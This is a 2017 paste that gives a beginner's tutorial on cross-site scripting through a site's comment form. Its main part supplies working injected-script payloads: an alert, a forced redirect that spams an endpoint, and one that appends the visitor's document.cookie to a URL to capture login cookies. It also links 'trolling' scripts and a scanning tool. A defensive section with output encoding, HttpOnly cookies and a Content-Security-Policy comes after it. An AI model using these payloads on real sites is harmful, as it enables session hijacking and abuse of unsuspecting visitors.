pahapoika91

XSS

Jan 9th, 2017
Hey!
Today I will teach you the basics of XSS attacks.

If you haven't heard about XSS attacks, I suggest that you read:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
and
https://excess-xss.com/

In this scenario we will inject JavaScript using a comment form.

You can use JavaScript like

<script type="text/javascript">
alert("123 test 123")
</script>

to create an alert saying "123 test 123" every time someone visits the site.

You can also use these JavaScripts for trolling reasons:
https://www.mediafire.com/folder/z553a49pjbil5/javascripts
(you can make text blink, you can redirect the page, or you can rickroll with these scripts, for example)

You can also use

<script type="text/javascript">
window.location = 'http://victim/path/cookies.php?cookie=hey';
</script>

This will spam the victim's cookies.php with the word "hey".

To get the victim website's cookies, use

<script type="text/javascript">
window.location = 'http://victim/path/cookies.php?cookie=hey'+document.cookie;
</script>

Now you should see all saved cookies in the URL bar
(you might see login details or IP addresses, for example).

You can exploit XSS using the URL bar, a comment form, or a tool called Xenotix.

(In Xenotix's POST request scanner, enter the script into the Parameters bar, which is below the URL.)

Now you should know the basics of XSS attacks.

-pahapoika91
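
What stops the comment-form injection and the document.cookie read described above, as an added example that is not part of the original paste: output encoding when the comment is rendered, an HttpOnly session cookie, and a Content-Security-Policy that refuses inline scripts. The function names, the `sid` cookie and the sample comments are assumptions constructed for illustration.

```javascript
// Added defensive example (not from the original paste).
// Constructed comment bodies: the two payload shapes the paste describes,
// plus one harmless comment.
const SAMPLE_COMMENTS = [
  '<script type="text/javascript">alert("123 test 123")</script>',
  "<script type=\"text/javascript\">window.location = 'http://victim/path/cookies.php?cookie=hey'+document.cookie;</script>",
  "Nice post & thanks!",
];

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can open a tag, attribute value or entity in HTML.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical renderer for the comment list: user text is only ever placed
// in element content, and only after encoding, so it is shown as text.
function renderComment(author, body) {
  return `<li class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</li>`;
}

function renderAll(comments) {
  return comments.map((c) => renderComment("guest", c)).join("\n");
}

// Session cookie marked HttpOnly so document.cookie cannot read it;
// Secure and SameSite limit where the browser sends it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Second layer: with this policy the browser will not execute inline
// <script> blocks even if one reaches the page unencoded.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

console.log(renderAll(SAMPLE_COMMENTS));
console.log("Set-Cookie:", sessionCookieHeader("sid", "constructed-session-id"));
console.log("Content-Security-Policy:", CSP_HEADER);
```

Encoding has to match the output context: this helper covers HTML element content and quoted attribute values, not URLs or inline JavaScript.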